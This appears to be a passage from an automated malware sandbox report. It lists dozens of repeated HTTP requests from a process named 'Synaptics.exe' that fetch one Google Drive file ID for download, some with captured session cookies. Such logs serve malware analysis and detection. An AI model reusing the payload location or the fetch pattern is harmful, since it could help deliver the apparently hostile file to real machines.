                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=JGnwI_MrsxSh5MBfXa7e5IGnwl-ptwajyonA18zaUTPq55C8vR_TGrQg_gtonkz49RyPV0DRYh4IJ4Mmnf7-zS-qApMkY5BYyO3wNjs_yfOU5ow0eVQUHfXqysZHTtoGjzn2_o1eI9UD6xsuiOh_cDgmkMUYU6VIgwjj-O3VN1-XW24tC42u91c
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Lg--Z3MNSR6dPItDRtKtP1r9cxxvxAnqX_seVCI6-qswVZogoBMsy20UdoyvolgY4jsXxa03MypjCddOfLfnmlLI7lN7IlZduEZIatbBpXtzPJ8etFv4N6IpLm-XEEoTbE_64lHHATt3pCnDxEKnJ_69QRAFEoyKi-Yzj7JKmhP1M6ERhD7W0_8
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=JGnwI_MrsxSh5MBfXa7e5IGnwl-ptwajyonA18zaUTPq55C8vR_TGrQg_gtonkz49RyPV0DRYh4IJ4Mmnf7-zS-qApMkY5BYyO3wNjs_yfOU5ow0eVQUHfXqysZHTtoGjzn2_o1eI9UD6xsuiOh_cDgmkMUYU6VIgwjj-O3VN1-XW24tC42u91c
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=JGnwI_MrsxSh5MBfXa7e5IGnwl-ptwajyonA18zaUTPq55C8vR_TGrQg_gtonkz49RyPV0DRYh4IJ4Mmnf7-zS-qApMkY5BYyO3wNjs_yfOU5ow0eVQUHfXqysZHTtoGjzn2_o1eI9UD6xsuiOh_cDgmkMUYU6VIgwjj-O3VN1-XW24tC42u91c
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=JGnwI_MrsxSh5MBfXa7e5IGnwl-ptwajyonA18zaUTPq55C8vR_TGrQg_gtonkz49RyPV0DRYh4IJ4Mmnf7-zS-qApMkY5BYyO3wNjs_yfOU5ow0eVQUHfXqysZHTtoGjzn2_o1eI9UD6xsuiOh_cDgmkMUYU6VIgwjj-O3VN1-XW24tC42u91c
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Lg--Z3MNSR6dPItDRtKtP1r9cxxvxAnqX_seVCI6-qswVZogoBMsy20UdoyvolgY4jsXxa03MypjCddOfLfnmlLI7lN7IlZduEZIatbBpXtzPJ8etFv4N6IpLm-XEEoTbE_64lHHATt3pCnDxEKnJ_69QRAFEoyKi-Yzj7JKmhP1M6ERhD7W0_8
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Lg--Z3MNSR6dPItDRtKtP1r9cxxvxAnqX_seVCI6-qswVZogoBMsy20UdoyvolgY4jsXxa03MypjCddOfLfnmlLI7lN7IlZduEZIatbBpXtzPJ8etFv4N6IpLm-XEEoTbE_64lHHATt3pCnDxEKnJ_69QRAFEoyKi-Yzj7JKmhP1M6ERhD7W0_8
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Lg--Z3MNSR6dPItDRtKtP1r9cxxvxAnqX_seVCI6-qswVZogoBMsy20UdoyvolgY4jsXxa03MypjCddOfLfnmlLI7lN7IlZduEZIatbBpXtzPJ8etFv4N6IpLm-XEEoTbE_64lHHATt3pCnDxEKnJ_69QRAFEoyKi-Yzj7JKmhP1M6ERhD7W0_8
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Lg--Z3MNSR6dPItDRtKtP1r9cxxvxAnqX_seVCI6-qswVZogoBMsy20UdoyvolgY4jsXxa03MypjCddOfLfnmlLI7lN7IlZduEZIatbBpXtzPJ8etFv4N6IpLm-XEEoTbE_64lHHATt3pCnDxEKnJ_69QRAFEoyKi-Yzj7JKmhP1M6ERhD7W0_8
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Lg--Z3MNSR6dPItDRtKtP1r9cxxvxAnqX_seVCI6-qswVZogoBMsy20UdoyvolgY4jsXxa03MypjCddOfLfnmlLI7lN7IlZduEZIatbBpXtzPJ8etFv4N6IpLm-XEEoTbE_64lHHATt3pCnDxEKnJ_69QRAFEoyKi-Yzj7JKmhP1M6ERhD7W0_8
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Lg--Z3MNSR6dPItDRtKtP1r9cxxvxAnqX_seVCI6-qswVZogoBMsy20UdoyvolgY4jsXxa03MypjCddOfLfnmlLI7lN7IlZduEZIatbBpXtzPJ8etFv4N6IpLm-XEEoTbE_64lHHATt3pCnDxEKnJ_69QRAFEoyKi-Yzj7JKmhP1M6ERhD7W0_8
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Lg--Z3MNSR6dPItDRtKtP1r9cxxvxAnqX_seVCI6-qswVZogoBMsy20UdoyvolgY4jsXxa03MypjCddOfLfnmlLI7lN7IlZduEZIatbBpXtzPJ8etFv4N6IpLm-XEEoTbE_64lHHATt3pCnDxEKnJ_69QRAFEoyKi-Yzj7JKmhP1M6ERhD7W0_8
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Lg--Z3MNSR6dPItDRtKtP1r9cxxvxAnqX_seVCI6-qswVZogoBMsy20UdoyvolgY4jsXxa03MypjCddOfLfnmlLI7lN7IlZduEZIatbBpXtzPJ8etFv4N6IpLm-XEEoTbE_64lHHATt3pCnDxEKnJ_69QRAFEoyKi-Yzj7JKmhP1M6ERhD7W0_8
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Lg--Z3MNSR6dPItDRtKtP1r9cxxvxAnqX_seVCI6-qswVZogoBMsy20UdoyvolgY4jsXxa03MypjCddOfLfnmlLI7lN7IlZduEZIatbBpXtzPJ8etFv4N6IpLm-XEEoTbE_64lHHATt3pCnDxEKnJ_69QRAFEoyKi-Yzj7JKmhP1M6ERhD7W0_8
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
